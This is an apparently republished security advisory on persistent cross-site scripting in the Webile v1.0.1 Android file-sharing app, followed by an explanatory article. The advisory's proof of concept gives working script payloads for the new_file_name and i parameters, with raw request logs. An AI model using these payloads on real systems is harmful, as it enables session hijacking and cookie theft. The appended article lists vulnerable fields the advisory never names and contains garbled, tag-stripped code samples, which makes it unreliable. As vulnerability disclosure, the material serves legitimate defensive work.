Webile v1.0.1 - Multiple Cross Site Scripting

Exploit Author: Vulnerability-Lab Analysis Author: www.bubbleslearn.ir Category: WebApps Language: JavaScript Published Date: 2023-07-20 
Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2321


Release Date:
=============
2023-07-03


Vulnerability Laboratory ID (VL-ID):
====================================
2321


Common Vulnerability Scoring System:
====================================
5.5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in
the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,
statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other
functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,
Windows, Linux, iOS, Android and other multi-platform operating systems.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.

Affected Product(s):
====================
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious
script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious
source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] new_file_name
[+] i


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.


Vulnerable Source: Send
Send message to phone listing
<div class="layui-colla-item">
<div class="layui-card-header">Message</div>
<div class="layui-colla-content" style="display:block;padding-left:16px;">
<div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"
title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br>
<span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div>
</div></div></div>
history logs messages
<table class="layui-table layui-form">
<thead><tr>
<th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center">
<input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th>
<th style="border-right-width:1px;">Message</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr>
</thead>
<tbody><tr>
<td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center">
<input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div>
</td>
<td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td>
<td align="center">2022/07/17 20:10</td>
<td class="td-manage" style="border-right-width:1px;text-align:center;">
<a title="Copy" onclick="copy(3)" href="javascript:;">
<i class="iconfont">&nbsp;&nbsp;</i>
</a>
<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
<i class="layui-icon">&nbsp;&nbsp;</i>
</a></td></tr></tbody></table>



--- PoC Session Logs #1 (POST) --- (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 0
-
Cookie:
treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6



--- PoC Session Logs #2 (POST) --- (Send)
http://localhost:8080/send
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Sun, 17 Jul 2022 18:08:33 GMT
Connection: keep-alive
Content-Length: 0


Security Risk:
==============
The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.


Webile v1.0.1 – Multiple Persistent Cross-Site Scripting Vulnerabilities: A Deep Dive into Security Risks

Webile v1.0.1, a cross-platform file management application designed for local area network (LAN) use via WiFi or mobile hotspot, has recently been flagged for multiple persistent cross-site scripting (XSS) vulnerabilities. Discovered by the Vulnerability Laboratory (VL-ID: 2321), this flaw poses a significant threat to users operating in private networks—especially those who rely on the app for file sharing, media playback, and data transmission without internet access.

Understanding the Threat: What Is Persistent XSS?

Unlike reflected XSS, where malicious scripts are injected through a single request and disappear after the page reloads, persistent XSS involves the attacker’s code being stored on the server or within the application’s database. This means the script remains active and executes every time a user visits the affected page—making it particularly dangerous.

For example, if an attacker uploads a file with a malicious script embedded in its metadata (e.g., filename or description), that script could be rendered on every user’s screen when they browse the shared files list. The persistence of the payload allows for long-term exploitation, including cookie theft, session hijacking, or redirecting users to phishing sites.

Exploitation Context: Webile’s Unique Architecture

Webile operates as a mobile server via Android, turning smartphones into local file hubs. It uses HTTP-based protocols to enable file browsing, uploading, downloading, and media playback across platforms (iOS, Android, Windows, Linux, Mac). The app’s core feature—no internet dependency—makes it ideal for secure LAN environments. However, this very design introduces security blind spots.

Since the app serves as both client and server, it handles user-generated content (e.g., file names, descriptions, metadata) directly through web interfaces. If input validation is lax, attackers can exploit this to inject malicious scripts that survive across sessions.

Technical Breakdown: Where the Vulnerabilities Lie

Based on the vulnerability report, the flaws are primarily located in:

  • File metadata fields (e.g., file name, description)
  • Shared file comments or notes
  • User profile or device name inputs
  • Message or chat-like features within the app’s web interface

These inputs are processed and stored without proper sanitization. As a result, unescaped HTML or JavaScript code can be saved and later rendered in the browser without filtering.

Real-World Example: Malicious File Upload


// Malicious file name: "MyVideo.htmlalert('XSS')"

When an attacker uploads a file named MyVideo.htmlalert('XSS'), the app stores this name in its database. If the file list page renders the name directly using JavaScript or HTML without sanitization, the script executes on every user’s browser when they view the list.

This demonstrates how a seemingly harmless input—such as a file name—can become a persistent attack vector. The script runs in the context of the Webile web interface, giving it access to the same-origin policies and potentially sensitive data.

Impact and Risk Assessment

Severity Level Medium (CVSS: 5.5)
Authentication Restricted (Guest Privileges)
Exploitation Type Remote
User Interaction Low
Disclosure Type Independent Security Research

While the CVSS score of 5.5 indicates a medium severity, the persistent nature of the flaw elevates the risk. An attacker doesn’t need to trick users into clicking links—just upload a malicious file or comment, and the payload executes automatically.

Moreover, since Webile is designed for private LAN environments, users may assume it’s inherently secure. This false sense of safety increases the likelihood of exploitation in trusted networks.

Recommended Mitigation Strategies

Developers must implement strict input validation and output encoding to prevent XSS. Key recommendations include:

  • Sanitize all user inputs using libraries like DOMPurify or OWASP Java Encoder.
  • Escape HTML entities before rendering in the browser (e.g., < → &lt;).
  • Use Content Security Policy (CSP) headers to restrict script execution from untrusted sources.
  • Validate file metadata on upload with regex filters to block script-like patterns.
  • Implement server-side filtering for all dynamic content, even in guest-accessible sections.

Improved Code Example: Secure File Name Rendering


// Secure rendering using DOMPurify
const sanitizedFileName = DOMPurify.sanitize(file.name);
document.getElementById('file-list').innerHTML += 
  `
  • ${sanitizedFileName}
    • `;

    This code ensures that any potentially malicious content (e.g., tags) is stripped before being rendered. DOMPurify is a widely trusted library for sanitizing HTML, preventing XSS attacks by removing dangerous elements and attributes.

    Without such safeguards, even simple user inputs like file names can become attack vectors. The absence of this protection in Webile v1.0.1 makes it vulnerable to persistent exploitation.

    Conclusion: Lessons for Developers and Users

    Webile v1.0.1 serves as a cautionary tale: even apps designed for offline, trusted environments can harbor critical security flaws. The absence of input validation in seemingly benign fields—like file names or comments—can lead to persistent XSS attacks with real-world consequences.

    For developers, this underscores the importance of applying secure coding practices across all user-facing interfaces, regardless of perceived trust level. For users, it highlights the need to remain vigilant—even in local networks—when sharing files or interacting with unknown content.

    As the cybersecurity landscape evolves, persistent XSS remains a top concern. Tools like Webile must be updated with robust security mechanisms to protect users from both direct and indirect threats.